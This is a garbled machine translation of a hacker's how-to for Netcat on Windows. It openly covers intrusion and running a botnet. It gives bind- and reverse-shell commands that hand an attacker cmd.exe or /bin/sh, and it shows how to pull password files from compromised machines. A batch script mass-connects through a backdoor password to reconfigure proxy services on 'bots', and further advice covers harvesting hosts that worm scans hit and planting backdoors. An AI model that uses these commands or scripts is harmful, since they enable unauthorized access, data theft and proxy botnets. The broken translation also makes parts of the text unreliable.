Nc.exe Advanced Skills Application Summary
Author: zhoutree
0. Preface
1. Netcat 1.10 for NT-nc11nt.zip, original English Information
2. Netcat 1.10 for NT help information
3. Common Netcat 1.10 command formats
4. Manage bots and change zombie settings
5. Download the connection
6. Postscript
######################################## ##############################
0. Preface
######################################## ##############################
Recently, my work is relatively idle. I always want to automatically telnet bots and execute commands. To manage your bots.
Write a program by yourself. The knowledge is not enough, so I only read the help information of nc, although I only read a half understand,
However, with Kingsoft 2002, I still understand something.
I think it is necessary to sum up again. Anyway, it mainly meets my own needs.
######################################## ##############################
1. Netcat 1.10 for NT-nc11nt.zip
######################################## ##############################
Basic Features
* Outbound or inbound connections, TCP or UDP, to or from any ports
* Full DNS forward/reverse checking, with appropriate warnings
* Ability to use any local source port
* Ability to use any locally-configured network source address
* Built-in port-scanning capabilities, with randomizer
* Can read command line arguments from standard inputb
* Slow-send mode, one line every N seconds
* Hex dump of transmitted and stored ed data
* Ability to let another program service established
Connections
* Telnet-options responder
New for NT
* Ability to run in the background without a console window
* Ability to restart as a single-threaded server to handle a new
Connection
________________________________________________________________________
Some of the features of netcat are:
Outbound or inbound connections, TCP or UDP, to or from any ports
Full DNS forward/reverse checking, with appropriate warnings
Ability to use any local source port
Ability to use any locally-configured network source address
Built-in port-scanning capabilities, with randomizer
Built-in loose source-routing capability
Can read command line arguments from standard input
Slow-send mode, one line every N seconds
Optional ability to let another program service inbound connections
Some of the potential uses of netcat:
Script backends
Scanning ports and inventorying services
Backup handlers
File transfers
Server testing and simulation
Firewall testing
Proxy gatewaying
Network performance testing
Address spoofing tests
Protecting X servers
1001 other uses you'll likely come up
Netcat + Encryption = Cryptcat
In contrast to win2000's soft telnet.exeand Microsoft tlntsvr.exe services, we can see it when connecting.
1.1 NC. EXE is a non-standard telnet client program,
1.2 there is also a putty.exe client program that provides four connection modes
-Raw-telnet-rlogin-ssh.
######################################## ##############################
2. Netcat 1.10 for NT help information
######################################## ##############################
C: \ WINDOWS \ Desktop> nc-h
[V1.10 NT]
Connect to somewhere: nc [-options] hostname port [s] [ports]...
Listen for inbound: nc-l-p port [options] [hostname] [port]
Options:
-D detach from console, background mode (background mode)
-E prog inbound program to exec [dangerous!]
-G gateway source-routing hop point [s], up to 8
-G num source-routing pointer: 4, 8, 12 ,...
-H this cruft (this help information)
-I secs delay interval for lines sent, ports scanned (delay Time)
-L listen mode, for inbound connects (listener mode, waiting for connection)
-L listen harder, re-listen on socket close (the listener continues after the connection is closed)
-N numeric-only IP addresses, no DNS (ip digital mode, non-dns resolution)
-O file hex dump of traffic (hexadecimal output file, three sections)
-P port local port number (local port)
-R randomize local and remote ports (random local remote port)
-S addr local source address (local source address)
-T answer TELNET negotiation
-U UDP mode
-V verbose [use twice to be more verbose] (-vv for more information)
-W secs timeout for connects and final net reads
-Z zero-I/O mode [used for scanning] (scan mode,-vv)
Port numbers can be individual or ranges: m-n [random sive]
######################################## ##############################
3. Common Netcat 1.10 command formats
######################################## ##############################
The following is a reference to the article "sleep and don't wake up in the early morning of March October 15.
3. 1. Port probing:
Nc-vv ip port
The RIVER [192.168.0.198] 19190 (?) Open // display whether open
3. 2. Scanner
Nc-vv-w 5 ip port-port
Nc-vv-z ip port-port
This scan will leave a lot of traces, and the system administrator will be extra careful
3.3. Backdoor
Victim machine: // the victim's machine
Nc-l-p port-e cmd.exe // win2000
Nc-l-p port-e/bin/sh // unix, linux
Attacker machine: // attacker's machine.
Nc ip-p port // connect to victim_IP and get a shell.
3. 4. Reverse connection
Attacker machine: // It is generally sql2.exe, with remote overflow and webdavx3.exe attacks.
// Or wollf reverse connection.
Nc-vv-l-p port
Victim machine:
Nc-e cmd.exe attacker ip-p port
Nc-e/bin/sh attacker ip-p port
Or:
Attacker machine:
Nc-vv-l-p port1/* for input */
Nc-vv-l-p prot2/* for display */
Victim machine:
Nc attacker_ip port1 | cmd.exe | nc attacker_ip port2
Nc attacker_ip port1 |/bin/sh | nc attacker_ip port2
139add ipv-s(nc.exe-L-p 139-d-e cmd.exe-s IP address of the other machine)
This ensures that nc.exe takes precedence over NETBIOS.
3. 5. transfer files:
3.5.1 attacker machine <-- victim machine // drag the password file back from the zombie.
Nc-d-l-p port <path \ filedest/* attacker machine */can be executed by shell
Nc-vv attacker_ip port> path \ file.txt/* victim machine */Ctrl + C to exit
// Execute the command in cmd.exe on the guiinterface (it is better to install FTP when logging on to the terminal). Otherwise, you cannot enter Crl + C.
3.5.2 attacker machine --> victim machine // upload the command file to the bot
Nc-vv-l-p port> path \ file.txt/* victim machine */Ctrl + C to exit
Nc-d victim_ip port <path \ filedest/* attacker machine */can be executed by shell
// This is better. We log on to the terminal and intrude into other bots. You can select shell mode to log on.
Conclusion: ascii and binfile can be transmitted. program files can be transmitted.
Problem: after connecting to an IP address, after the transfer is complete, the ctrlw.cout nc.exe is sent.
The handler only connects to use pskill.exe again to kill the process. But have you released the handle for opening the transfer file?
3.6 port data packet capture.
Nc-vv-w 2-o test.txt www.xfocus.net 80 21-15
<00000058 35 30 30 20 53 79 6e 74 61 78 20 65 72 72 6f 72 #500 Syntax error
<00000068 2c 20 63 6f 6d 6d 61 6e 64 20 22 20 75 6e 72 #, command "" unr
<00000078 65 63 6f 67 6e 69 7a 65 64 2e 0d 0a # ecognized...
<00000084 83 00 00 01 8f #.....
3.7 telnet, automatic batch processing.★★★★★This is what I want to focus on.
Nc victim_ip port <path \ file. cmd/* victim machine */displays the execution process.
Nc-vv victim_ip port <path \ file. cmd/* victim machine */displays the execution process.
Nc-d victim_ip port <path \ file. cmd quiet mode.
_______________ File. cmd ________________________
Password
Cd % windir %
Echo [] = [% windir %]
C:
Cd \
Md test
Cd/d % windir % \ system32 \
Net stop sksockserver
Snak.exe-config port 11111
Net start sksockserver
Exit
___________ File. cmd _ END ___________________
######################################## ##############################
4. Manage bots and change zombie settings
######################################## ##############################
4.1 change the proxy port .snake.exe of the meat chicken farm to 11111 service name "sksockserver"
Use winshell backdoor. Port 1234 password
The command format is
Modi. bat youip.txt
___________ Modi. bat ____________________________
@ If "% 1" = "" echo Error: no ip.txt & goto END
: Start
@ Echo password> a. cmd
@ Echo s> a. cmd
@ Echo cd/d % windir % \ system32 \> a. cmd
@ Net stop "sksockserver"> a. cmd
@ Snail ke.exe-config port 11111> a. cmd
@ Net start "sksockserver"> a. cmd
@ Exit> a. cmd
: Auto
@ For/f "eol =; tokens = 3%" % I in (% 1) do @(nc.exe-vv-w 1234% I <a. cmd)
: END
___________ Modi. bat _ END _______________________
4.2
@ Echo off
Color f0
: Start
Cls
C: \ nc-vv-w 3-l-p 80> 80.txt
Goto start
After you turn off the firewall and run the batch processing, many U vulnerability detection information will be monitored.
There are three groups-the Nimda virus scans you. In this way, the zombie will be obtained, although the quality is not high.
But it is also a cheap method.
BOT features:
1. Unicode Vulnerability
2. The guest password is empty and the administrators group is used.
3. Other vulnerabilities
Take it easy. Then, I tried to force the upgrade again, but it was not recommended that tftp.exe be renamed later. Then, use pskillto remove the mmc.exe process, followed by anti-virus. After completing the backdoor, stop the guest account to deal with the dumb scanner.
######################################## ##############################
5. Download the connection
######################################## ##############################
5.1 http://www.atstake.com/research/tools/network_utilities/
Tool: Netcat 1.10 for Unix
Version: 03.000096
Platforms: * nix
Tool: Netcat 1.1 for Win 95/98/NT/2000
Version: 02.08.98
Platforms: Runs on Win 95/98/NT/2000
5.2 http://www.xfocus.net/download.php? Id = 320
Name: cryptcat_nt.zip updated:
Category: network Tool Platform: Win9x/NT/2000 size: 115.8 K submit: maxilaw
Description: The nc for encrypted transmission.
5.3 http://content.443.ch/pub/security/blackhat/Networking/nc/ foreign site
10.03.02 1305 cryptcat.txt
10.03.02 245760 cryptcat_linux2.tar
10.03.02 118533 cryptcat_nt.zip